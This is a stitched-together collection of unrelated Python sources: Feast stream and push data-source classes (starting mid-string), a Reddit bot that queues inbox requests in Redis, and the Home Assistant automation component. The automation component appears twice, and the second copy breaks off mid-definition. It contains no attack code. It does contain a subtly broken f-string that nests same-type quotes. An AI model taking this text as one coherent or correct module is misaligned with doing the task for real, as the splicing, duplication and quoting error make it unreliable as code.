This class name will be removed in Feast 0.23.", DeprecationWarning, ) super().__init__(*args, **kwargs) class KinesisSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): return KinesisSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), record_format=StreamFormat.from_proto( data_source.kinesis_options.record_format ), region=data_source.kinesis_options.region, stream_name=data_source.kinesis_options.stream_name, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: pass def get_table_query_string(self) -> str: raise NotImplementedError def __init__( self, *args, name: Optional[str] = None, event_timestamp_column: Optional[str] = "", created_timestamp_column: Optional[str] = "", record_format: Optional[StreamFormat] = None, region: Optional[str] = "", stream_name: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "created_timestamp_column", "record_format", "region", "stream_name", ] _name = name _event_timestamp_column = event_timestamp_column _created_timestamp_column = created_timestamp_column _record_format = record_format _region = region or "" _stream_name = stream_name or "" if args: warnings.warn( ( "Kinesis parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct kinesis sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"kinesis sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _created_timestamp_column = args[2] if len(args) >= 4: _record_format = args[3] if len(args) >= 5: _region = args[4] if len(args) >= 6: _stream_name = args[5] if _record_format is None: raise ValueError("Record format must be specified for kinesis source") super().__init__( name=_name, event_timestamp_column=_event_timestamp_column, created_timestamp_column=_created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kinesis_options = KinesisOptions( record_format=_record_format, region=_region, stream_name=_stream_name ) def __eq__(self, other): if not isinstance(other, KinesisSource): raise TypeError( "Comparisons should only involve KinesisSource class objects." 
) if not super().__eq__(other): return False if ( self.kinesis_options.record_format != other.kinesis_options.record_format or self.kinesis_options.region != other.kinesis_options.region or self.kinesis_options.stream_name != other.kinesis_options.stream_name ): return False return True def __hash__(self): return super().__hash__() def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KINESIS, field_mapping=self.field_mapping, kinesis_options=self.kinesis_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto class PushSource(DataSource): """ A source that can be used to ingest features on request """ # TODO(adchia): consider adding schema here in case where Feast manages pushing events to the offline store # TODO(adchia): consider a "mode" to support pushing raw vs transformed events batch_source: DataSource def __init__( self, *args, name: Optional[str] = None, batch_source: Optional[DataSource] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """ Creates a PushSource object. Args: name: Name of the push source batch_source: The batch source that backs this push source. It's used when materializing from the offline store to the online store, and when retrieving historical features. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. """ positional_attributes = ["name", "batch_source"] _name = name _batch_source = batch_source if args: warnings.warn( ( "Push source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct push sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"push sources, for backwards compatibility." 
) if len(args) >= 1: _name = args[0] if len(args) >= 2: _batch_source = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _batch_source: raise ValueError( f"batch_source parameter is needed for push source {self.name}" ) self.batch_source = _batch_source def __eq__(self, other): if not isinstance(other, PushSource): raise TypeError("Comparisons should only involve PushSource class objects.") if not super().__eq__(other): return False if self.batch_source != other.batch_source: return False return True def __hash__(self): return super().__hash__() def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): assert data_source.HasField("batch_source") batch_source = DataSource.from_proto(data_source.batch_source) return PushSource( name=data_source.name, batch_source=batch_source, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: batch_source_proto = None if self.batch_source: batch_source_proto = self.batch_source.to_proto() data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.PUSH_SOURCE, description=self.description, tags=self.tags, owner=self.owner, batch_source=batch_source_proto, ) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError
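# Hypothetical usage sketch for the sources defined above, using keyword arguments
# only (positional arguments are deprecated by the warnings in this module). The
# names, path, topic and JSON schema are made up for illustration, and JsonFormat /
# FileSource are assumed to be importable as in recent Feast releases.
from feast.data_format import JsonFormat                         # assumed available
from feast.infra.offline_stores.file_source import FileSource    # path as listed in _DATA_SOURCE_OPTIONS

driver_batch = FileSource(
    name="driver_stats_batch",                  # hypothetical example values
    path="data/driver_stats.parquet",
    timestamp_field="event_timestamp",
)

driver_stream = KafkaSource(
    name="driver_stats_stream",
    bootstrap_servers="localhost:9092",
    message_format=JsonFormat(schema_json="driver_id: int64, event_timestamp: timestamp"),
    topic="driver_stats",
    timestamp_field="event_timestamp",
    batch_source=driver_batch,                  # stream sources are backed by a batch source
)

driver_push = PushSource(name="driver_stats_push", batch_source=driver_batch)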
#!/usr/bin/env python3 import json import logging import os import sys import redis import shared.util as util from shared.exceptions import AlreadyProcessed, CurrentlyProcessing def main(): for message in reddit.inbox.stream(): search(message) def search(message): bot_mention = util.contains_username(config['BOT_NAME'], message.body) link = util.contains_link(message.body) if bot_mention or link: try: search_request(message) except (AlreadyProcessed, CurrentlyProcessing) as pe: util.open_lock(redis, message.id) message.mark_read() logging.error(f"{pe} Trying to mark as read.") except Exception as e: util.open_lock(redis, message.id) logging.error(f"{type(e).__name__} occurred while searching for request {message.id}: {e}") def search_request(message): # Create request request = { "id": message.id, "type": "comment" if message.was_comment else "message", "author": str(message.author), "link": f"https://www.reddit.com{message.context}" if message.was_comment else f"https://www.reddit.com/message/messages/{message.id}", "retries": 0 } # Check for duplicates util.already_processed_check(redis, request) lock = util.get_lock(request['id']) if redis.exists(lock): raise CurrentlyProcessing(request['link']) # Lock request to avoid duplicates redis.set(lock, "") request_json = json.dumps(request) # Enqueue for filtering redis.sadd(config['REDIS_REQUESTS_FILTER'], request_json) message.mark_read() logging.info(f"Found new request {request['id']} : {request['link']}.") if __name__ == '__main__': util.log("search") config = util.load_configuration() reddit = util.authenticate() redis = redis.Redis(host=os.environ['REDIS_HOST'], port=os.environ['REDIS_PORT']) main()
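# The per-request lock in search_request() above is a plain SET with no expiry, and
# the exists()/set() pair is not atomic, so a crash in between can leave a request
# locked forever. A small alternative sketch (key name and TTL are illustrative,
# not part of the original shared.util module) using redis-py's SET with nx/ex:
def try_lock(conn, request_id, ttl_seconds=300):
    """Atomically acquire a per-request lock; returns False if it is already held."""
    # nx=True -> only set when the key does not exist yet; ex=... -> auto-expire
    return bool(conn.set(f"lock:{request_id}", "1", nx=True, ex=ttl_seconds))

# Usage inside search_request(), replacing the exists()/set() pair:
#   if not try_lock(redis, request['id']):
#       raise CurrentlyProcessing(request['link'])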
"""Allow to set up simple automation rules via the config file.""" from __future__ import annotations import logging from typing import Any, Awaitable, Callable, Dict, cast import voluptuous as vol from voluptuous.humanize import humanize_error from homeassistant.components import blueprint from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_MODE, ATTR_NAME, CONF_ALIAS, CONF_CONDITION, CONF_DEVICE_ID, CONF_ENTITY_ID, CONF_ID, CONF_MODE, CONF_PLATFORM, CONF_VARIABLES, CONF_ZONE, EVENT_HOMEASSISTANT_STARTED, SERVICE_RELOAD, SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON, STATE_ON, ) from homeassistant.core import ( Context, CoreState, HomeAssistant, callback, split_entity_id, ) from homeassistant.exceptions import ( ConditionError, ConditionErrorContainer, ConditionErrorIndex, HomeAssistantError, ) from homeassistant.helpers import condition, extract_domain_configs, template import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import ToggleEntity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.helpers.script import ( ATTR_CUR, ATTR_MAX, CONF_MAX, CONF_MAX_EXCEEDED, Script, ) from homeassistant.helpers.script_variables import ScriptVariables from homeassistant.helpers.service import async_register_admin_service from homeassistant.helpers.trace import trace_get, trace_path from homeassistant.helpers.trigger import async_initialize_triggers from homeassistant.helpers.typing import TemplateVarsType from homeassistant.loader import bind_hass from homeassistant.util.dt import parse_datetime from . import websocket_api from .config import AutomationConfig, async_validate_config_item # Not used except by packages to check config structure from .config import PLATFORM_SCHEMA # noqa: F401 from .const import ( CONF_ACTION, CONF_INITIAL_STATE, CONF_TRIGGER, CONF_TRIGGER_VARIABLES, DEFAULT_INITIAL_STATE, DOMAIN, LOGGER, ) from .helpers import async_get_blueprints from .trace import DATA_AUTOMATION_TRACE, trace_automation # mypy: allow-untyped-calls, allow-untyped-defs # mypy: no-check-untyped-defs, no-warn-return-any ENTITY_ID_FORMAT = DOMAIN + ".{}" CONF_SKIP_CONDITION = "skip_condition" CONF_STOP_ACTIONS = "stop_actions" DEFAULT_STOP_ACTIONS = True EVENT_AUTOMATION_RELOADED = "automation_reloaded" EVENT_AUTOMATION_TRIGGERED = "automation_triggered" ATTR_LAST_TRIGGERED = "last_triggered" ATTR_SOURCE = "source" ATTR_VARIABLES = "variables" SERVICE_TRIGGER = "trigger" _LOGGER = logging.getLogger(__name__) AutomationActionType = Callable[[HomeAssistant, TemplateVarsType], Awaitable[None]] @bind_hass def is_on(hass, entity_id): """ Return true if specified automation entity_id is on. Async friendly. 
""" return hass.states.is_state(entity_id, STATE_ON) @callback def automations_with_entity(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all automations that reference the entity.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if entity_id in automation_entity.referenced_entities ] @callback def entities_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all entities in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_entities) @callback def automations_with_device(hass: HomeAssistant, device_id: str) -> list[str]: """Return all automations that reference the device.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if device_id in automation_entity.referenced_devices ] @callback def devices_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all devices in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_devices) async def async_setup(hass, config): """Set up all automations.""" # Local import to avoid circular import hass.data[DOMAIN] = component = EntityComponent(LOGGER, DOMAIN, hass) hass.data.setdefault(DATA_AUTOMATION_TRACE, {}) websocket_api.async_setup(hass) # To register the automation blueprints async_get_blueprints(hass) if not await _async_process_config(hass, config, component): await async_get_blueprints(hass).async_populate() async def trigger_service_handler(entity, service_call): """Handle forced automation trigger, e.g. 
from frontend.""" await entity.async_trigger( {**service_call.data[ATTR_VARIABLES], "trigger": {"platform": None}}, skip_condition=service_call.data[CONF_SKIP_CONDITION], context=service_call.context, ) component.async_register_entity_service( SERVICE_TRIGGER, { vol.Optional(ATTR_VARIABLES, default={}): dict, vol.Optional(CONF_SKIP_CONDITION, default=True): bool, }, trigger_service_handler, ) component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle") component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on") component.async_register_entity_service( SERVICE_TURN_OFF, {vol.Optional(CONF_STOP_ACTIONS, default=DEFAULT_STOP_ACTIONS): cv.boolean}, "async_turn_off", ) async def reload_service_handler(service_call): """Remove all automations and load new ones from config.""" conf = await component.async_prepare_reload() if conf is None: return async_get_blueprints(hass).async_reset_cache() await _async_process_config(hass, conf, component) hass.bus.async_fire(EVENT_AUTOMATION_RELOADED, context=service_call.context) async_register_admin_service( hass, DOMAIN, SERVICE_RELOAD, reload_service_handler, schema=vol.Schema({}) ) return True class AutomationEntity(ToggleEntity, RestoreEntity): """Entity to show status of entity.""" def __init__( self, automation_id, name, trigger_config, cond_func, action_script, initial_state, variables, trigger_variables, raw_config, ): """Initialize an automation entity.""" self._id = automation_id self._name = name self._trigger_config = trigger_config self._async_detach_triggers = None self._cond_func = cond_func self.action_script = action_script self.action_script.change_listener = self.async_write_ha_state self._initial_state = initial_state self._is_enabled = False self._referenced_entities: set[str] | None = None self._referenced_devices: set[str] | None = None self._logger = LOGGER self._variables: ScriptVariables = variables self._trigger_variables: ScriptVariables = trigger_variables self._raw_config = raw_config @property def name(self): """Name of the automation.""" return self._name @property def unique_id(self): """Return unique ID.""" return self._id @property def should_poll(self): """No polling needed for automation entities.""" return False @property def extra_state_attributes(self): """Return the entity state attributes.""" attrs = { ATTR_LAST_TRIGGERED: self.action_script.last_triggered, ATTR_MODE: self.action_script.script_mode, ATTR_CUR: self.action_script.runs, } if self.action_script.supports_max: attrs[ATTR_MAX] = self.action_script.max_runs if self._id is not None: attrs[CONF_ID] = self._id return attrs @property def is_on(self) -> bool: """Return True if entity is on.""" return self._async_detach_triggers is not None or self._is_enabled @property def referenced_devices(self): """Return a set of referenced devices.""" if self._referenced_devices is not None: return self._referenced_devices referenced = self.action_script.referenced_devices if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_devices(conf) for conf in self._trigger_config: device = _trigger_extract_device(conf) if device is not None: referenced.add(device) self._referenced_devices = referenced return referenced @property def referenced_entities(self): """Return a set of referenced entities.""" if self._referenced_entities is not None: return self._referenced_entities referenced = self.action_script.referenced_entities if self._cond_func is not None: for conf in self._cond_func.config: 
referenced |= condition.async_extract_entities(conf) for conf in self._trigger_config: for entity_id in _trigger_extract_entities(conf): referenced.add(entity_id) self._referenced_entities = referenced return referenced async def async_added_to_hass(self) -> None: """Startup with initial state or previous state.""" await super().async_added_to_hass() self._logger = logging.getLogger( f"{__name__}.{split_entity_id(self.entity_id)[1]}" ) self.action_script.update_logger(self._logger) state = await self.async_get_last_state() if state: enable_automation = state.state == STATE_ON last_triggered = state.attributes.get("last_triggered") if last_triggered is not None: self.action_script.last_triggered = parse_datetime(last_triggered) self._logger.debug( "Loaded automation %s with state %s from state " " storage last state %s", self.entity_id, enable_automation, state, ) else: enable_automation = DEFAULT_INITIAL_STATE self._logger.debug( "Automation %s not in state storage, state %s from default is used", self.entity_id, enable_automation, ) if self._initial_state is not None: enable_automation = self._initial_state self._logger.debug( "Automation %s initial state %s overridden from " "config initial_state", self.entity_id, enable_automation, ) if enable_automation: await self.async_enable() async def async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on and update the state.""" await self.async_enable() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" if CONF_STOP_ACTIONS in kwargs: await self.async_disable(kwargs[CONF_STOP_ACTIONS]) else: await self.async_disable() async def async_trigger(self, run_variables, context=None, skip_condition=False): """Trigger automation. This method is a coroutine. """ reason = "" if "trigger" in run_variables and "description" in run_variables["trigger"]: reason = f' by {run_variables['trigger']['description']}' self._logger.debug("Automation triggered%s", reason) # Create a new context referring to the old context. parent_id = None if context is None else context.id trigger_context = Context(parent_id=parent_id) with trace_automation( self.hass, self.unique_id, self._raw_config, trigger_context ) as automation_trace: if self._variables: try: variables = self._variables.async_render(self.hass, run_variables) except template.TemplateError as err: self._logger.error("Error rendering variables: %s", err) automation_trace.set_error(err) return else: variables = run_variables automation_trace.set_variables(variables) # Prepare tracing the evaluation of the automation's conditions automation_trace.set_condition_trace(trace_get()) if ( not skip_condition and self._cond_func is not None and not self._cond_func(variables) ): self._logger.debug( "Conditions not met, aborting automation. 
Condition summary: %s", trace_get(clear=False), ) return # Prepare tracing the execution of the automation's actions automation_trace.set_action_trace(trace_get()) self.async_set_context(trigger_context) event_data = { ATTR_NAME: self._name, ATTR_ENTITY_ID: self.entity_id, } if "trigger" in variables and "description" in variables["trigger"]: event_data[ATTR_SOURCE] = variables["trigger"]["description"] @callback def started_action(): self.hass.bus.async_fire( EVENT_AUTOMATION_TRIGGERED, event_data, context=trigger_context ) try: with trace_path("action"): await self.action_script.async_run( variables, trigger_context, started_action ) except (vol.Invalid, HomeAssistantError) as err: self._logger.error( "Error while executing automation %s: %s", self.entity_id, err, ) automation_trace.set_error(err) except Exception as err: # pylint: disable=broad-except self._logger.exception("While executing automation %s", self.entity_id) automation_trace.set_error(err) async def async_will_remove_from_hass(self): """Remove listeners when removing automation from Home Assistant.""" await super().async_will_remove_from_hass() await self.async_disable() async def async_enable(self): """Enable this automation entity. This method is a coroutine. """ if self._is_enabled: return self._is_enabled = True # HomeAssistant is starting up if self.hass.state != CoreState.not_running: self._async_detach_triggers = await self._async_attach_triggers(False) self.async_write_ha_state() return async def async_enable_automation(event): """Start automation on startup.""" # Don't do anything if no longer enabled or already attached if not self._is_enabled or self._async_detach_triggers is not None: return self._async_detach_triggers = await self._async_attach_triggers(True) self.hass.bus.async_listen_once( EVENT_HOMEASSISTANT_STARTED, async_enable_automation ) self.async_write_ha_state() async def async_disable(self, stop_actions=DEFAULT_STOP_ACTIONS): """Disable the automation entity.""" if not self._is_enabled and not self.action_script.runs: return self._is_enabled = False if self._async_detach_triggers is not None: self._async_detach_triggers() self._async_detach_triggers = None if stop_actions: await self.action_script.async_stop() self.async_write_ha_state() async def _async_attach_triggers( self, home_assistant_start: bool ) -> Callable[[], None] | None: """Set up the triggers.""" def log_cb(level, msg, **kwargs): self._logger.log(level, "%s %s", msg, self._name, **kwargs) variables = None if self._trigger_variables: try: variables = self._trigger_variables.async_render( self.hass, None, limited=True ) except template.TemplateError as err: self._logger.error("Error rendering trigger variables: %s", err) return None return await async_initialize_triggers( self.hass, self._trigger_config, self.async_trigger, DOMAIN, self._name, log_cb, home_assistant_start, variables, ) async def _async_process_config( hass: HomeAssistant, config: dict[str, Any], component: EntityComponent, ) -> bool: """Process config and add automations. Returns if blueprints were used. 
""" entities = [] blueprints_used = False for config_key in extract_domain_configs(config, DOMAIN): conf: list[dict[str, Any] | blueprint.BlueprintInputs] = config[ # type: ignore config_key ] for list_no, config_block in enumerate(conf): raw_config = None if isinstance(config_block, blueprint.BlueprintInputs): # type: ignore blueprints_used = True blueprint_inputs = config_block try: raw_config = blueprint_inputs.async_substitute() config_block = cast( Dict[str, Any], await async_validate_config_item(hass, raw_config), ) except vol.Invalid as err: LOGGER.error( "Blueprint %s generated invalid automation with inputs %s: %s", blueprint_inputs.blueprint.name, blueprint_inputs.inputs, humanize_error(config_block, err), ) continue else: raw_config = cast(AutomationConfig, config_block).raw_config automation_id = config_block.get(CONF_ID) name = config_block.get(CONF_ALIAS) or f"{config_key} {list_no}" initial_state = config_block.get(CONF_INITIAL_STATE) action_script = Script( hass, config_block[CONF_ACTION], name, DOMAIN, running_description="automation actions", script_mode=config_block[CONF_MODE], max_runs=config_block[CONF_MAX], max_exceeded=config_block[CONF_MAX_EXCEEDED], logger=LOGGER, # We don't pass variables here # Automation will already render them to use them in the condition # and so will pass them on to the script. ) if CONF_CONDITION in config_block: cond_func = await _async_process_if(hass, name, config, config_block) if cond_func is None: continue else: cond_func = None # Add trigger variables to variables variables = None if CONF_TRIGGER_VARIABLES in config_block: variables = ScriptVariables( dict(config_block[CONF_TRIGGER_VARIABLES].as_dict()) ) if CONF_VARIABLES in config_block: if variables: variables.variables.update(config_block[CONF_VARIABLES].as_dict()) else: variables = config_block[CONF_VARIABLES] entity = AutomationEntity( automation_id, name, config_block[CONF_TRIGGER], cond_func, action_script, initial_state, variables, config_block.get(CONF_TRIGGER_VARIABLES), raw_config, ) entities.append(entity) if entities: await component.async_add_entities(entities) return blueprints_used async def _async_process_if(hass, name, config, p_config): """Process if checks.""" if_configs = p_config[CONF_CONDITION] checks = [] for if_config in if_configs: try: checks.append(await condition.async_from_config(hass, if_config, False)) except HomeAssistantError as ex: LOGGER.warning("Invalid condition: %s", ex) return None def if_action(variables=None): """AND all conditions.""" errors = [] for index, check in enumerate(checks): try: with trace_path(["condition", str(index)]): if not check(hass, variables): return False except ConditionError as ex: errors.append( ConditionErrorIndex( "condition", index=index, total=len(checks), error=ex ) ) if errors: LOGGER.warning( "Error evaluating condition in '%s':\n%s", name, ConditionErrorContainer("condition", errors=errors), ) return False return True if_action.config = if_configs return if_action @callback def _trigger_extract_device(trigger_conf: dict) -> str | None: """Extract devices from a trigger config.""" if trigger_conf[CONF_PLATFORM] != "device": return None return trigger_conf[CONF_DEVICE_ID] @callback def _trigger_extract_entities(trigger_conf: dict) -> list[str]: """Extract entities from a trigger config.""" if trigger_conf[CONF_PLATFORM] in ("state", "numeric_state"): return trigger_conf[CONF_ENTITY_ID] if trigger_conf[CONF_PLATFORM] == "zone": return trigger_conf[CONF_ENTITY_ID] + [trigger_conf[CONF_ZONE]] if 
trigger_conf[CONF_PLATFORM] == "geo_location": return [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "sun": return ["sun.sun"] return []
"""Allow to set up simple automation rules via the config file.""" from __future__ import annotations import logging from typing import Any, Awaitable, Callable, Dict, cast import voluptuous as vol from voluptuous.humanize import humanize_error from homeassistant.components import blueprint from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_MODE, ATTR_NAME, CONF_ALIAS, CONF_CONDITION, CONF_DEVICE_ID, CONF_ENTITY_ID, CONF_ID, CONF_MODE, CONF_PLATFORM, CONF_VARIABLES, CONF_ZONE, EVENT_HOMEASSISTANT_STARTED, SERVICE_RELOAD, SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON, STATE_ON, ) from homeassistant.core import ( Context, CoreState, HomeAssistant, callback, split_entity_id, ) from homeassistant.exceptions import ( ConditionError, ConditionErrorContainer, ConditionErrorIndex, HomeAssistantError, ) from homeassistant.helpers import condition, extract_domain_configs, template import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import ToggleEntity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.helpers.script import ( ATTR_CUR, ATTR_MAX, CONF_MAX, CONF_MAX_EXCEEDED, Script, ) from homeassistant.helpers.script_variables import ScriptVariables from homeassistant.helpers.service import async_register_admin_service from homeassistant.helpers.trace import trace_get, trace_path from homeassistant.helpers.trigger import async_initialize_triggers from homeassistant.helpers.typing import TemplateVarsType from homeassistant.loader import bind_hass from homeassistant.util.dt import parse_datetime from . import websocket_api from .config import AutomationConfig, async_validate_config_item # Not used except by packages to check config structure from .config import PLATFORM_SCHEMA # noqa: F401 from .const import ( CONF_ACTION, CONF_INITIAL_STATE, CONF_TRIGGER, CONF_TRIGGER_VARIABLES, DEFAULT_INITIAL_STATE, DOMAIN, LOGGER, ) from .helpers import async_get_blueprints from .trace import DATA_AUTOMATION_TRACE, trace_automation # mypy: allow-untyped-calls, allow-untyped-defs # mypy: no-check-untyped-defs, no-warn-return-any ENTITY_ID_FORMAT = DOMAIN + ".{}" CONF_SKIP_CONDITION = "skip_condition" CONF_STOP_ACTIONS = "stop_actions" DEFAULT_STOP_ACTIONS = True EVENT_AUTOMATION_RELOADED = "automation_reloaded" EVENT_AUTOMATION_TRIGGERED = "automation_triggered" ATTR_LAST_TRIGGERED = "last_triggered" ATTR_SOURCE = "source" ATTR_VARIABLES = "variables" SERVICE_TRIGGER = "trigger" _LOGGER = logging.getLogger(__name__) AutomationActionType = Callable[[HomeAssistant, TemplateVarsType], Awaitable[None]] @bind_hass def is_on(hass, entity_id): """ Return true if specified automation entity_id is on. Async friendly. 
""" return hass.states.is_state(entity_id, STATE_ON) @callback def automations_with_entity(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all automations that reference the entity.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if entity_id in automation_entity.referenced_entities ] @callback def entities_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all entities in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_entities) @callback def automations_with_device(hass: HomeAssistant, device_id: str) -> list[str]: """Return all automations that reference the device.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if device_id in automation_entity.referenced_devices ] @callback def devices_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all devices in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_devices) async def async_setup(hass, config): """Set up all automations.""" # Local import to avoid circular import hass.data[DOMAIN] = component = EntityComponent(LOGGER, DOMAIN, hass) hass.data.setdefault(DATA_AUTOMATION_TRACE, {}) websocket_api.async_setup(hass) # To register the automation blueprints async_get_blueprints(hass) if not await _async_process_config(hass, config, component): await async_get_blueprints(hass).async_populate() async def trigger_service_handler(entity, service_call): """Handle forced automation trigger, e.g. 
from frontend.""" await entity.async_trigger( {**service_call.data[ATTR_VARIABLES], "trigger": {"platform": None}}, skip_condition=service_call.data[CONF_SKIP_CONDITION], context=service_call.context, ) component.async_register_entity_service( SERVICE_TRIGGER, { vol.Optional(ATTR_VARIABLES, default={}): dict, vol.Optional(CONF_SKIP_CONDITION, default=True): bool, }, trigger_service_handler, ) component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle") component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on") component.async_register_entity_service( SERVICE_TURN_OFF, {vol.Optional(CONF_STOP_ACTIONS, default=DEFAULT_STOP_ACTIONS): cv.boolean}, "async_turn_off", ) async def reload_service_handler(service_call): """Remove all automations and load new ones from config.""" conf = await component.async_prepare_reload() if conf is None: return async_get_blueprints(hass).async_reset_cache() await _async_process_config(hass, conf, component) hass.bus.async_fire(EVENT_AUTOMATION_RELOADED, context=service_call.context) async_register_admin_service( hass, DOMAIN, SERVICE_RELOAD, reload_service_handler, schema=vol.Schema({}) ) return True class AutomationEntity(ToggleEntity, RestoreEntity): """Entity to show status of entity.""" def __init__( self, automation_id, name, trigger_config, cond_func, action_script, initial_state, variables, trigger_variables, raw_config, ): """Initialize an automation entity.""" self._id = automation_id self._name = name self._trigger_config = trigger_config self._async_detach_triggers = None self._cond_func = cond_func self.action_script = action_script self.action_script.change_listener = self.async_write_ha_state self._initial_state = initial_state self._is_enabled = False self._referenced_entities: set[str] | None = None self._referenced_devices: set[str] | None = None self._logger = LOGGER self._variables: ScriptVariables = variables self._trigger_variables: ScriptVariables = trigger_variables self._raw_config = raw_config @property def name(self): """Name of the automation.""" return self._name @property def unique_id(self): """Return unique ID.""" return self._id @property def should_poll(self): """No polling needed for automation entities.""" return False @property def extra_state_attributes(self): """Return the entity state attributes.""" attrs = { ATTR_LAST_TRIGGERED: self.action_script.last_triggered, ATTR_MODE: self.action_script.script_mode, ATTR_CUR: self.action_script.runs, } if self.action_script.supports_max: attrs[ATTR_MAX] = self.action_script.max_runs if self._id is not None: attrs[CONF_ID] = self._id return attrs @property def is_on(self) -> bool: """Return True if entity is on.""" return self._async_detach_triggers is not None or self._is_enabled @property def referenced_devices(self): """Return a set of referenced devices.""" if self._referenced_devices is not None: return self._referenced_devices referenced = self.action_script.referenced_devices if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_devices(conf) for conf in self._trigger_config: device = _trigger_extract_device(conf) if device is not None: referenced.add(device) self._referenced_devices = referenced return referenced @property def referenced_entities(self): """Return a set of referenced entities.""" if self._referenced_entities is not None: return self._referenced_entities referenced = self.action_script.referenced_entities if self._cond_func is not None: for conf in self._cond_func.config: 
referenced |= condition.async_extract_entities(conf) for conf in self._trigger_config: for entity_id in _trigger_extract_entities(conf): referenced.add(entity_id) self._referenced_entities = referenced return referenced async def async_added_to_hass(self) -> None: """Startup with initial state or previous state.""" await super().async_added_to_hass() self._logger = logging.getLogger( f"{__name__}.{split_entity_id(self.entity_id)[1]}" ) self.action_script.update_logger(self._logger) state = await self.async_get_last_state() if state: enable_automation = state.state == STATE_ON last_triggered = state.attributes.get("last_triggered") if last_triggered is not None: self.action_script.last_triggered = parse_datetime(last_triggered) self._logger.debug( "Loaded automation %s with state %s from state " " storage last state %s", self.entity_id, enable_automation, state, ) else: enable_automation = DEFAULT_INITIAL_STATE self._logger.debug( "Automation %s not in state storage, state %s from default is used", self.entity_id, enable_automation, ) if self._initial_state is not None: enable_automation = self._initial_state self._logger.debug( "Automation %s initial state %s overridden from " "config initial_state", self.entity_id, enable_automation, ) if enable_automation: await self.async_enable() async def 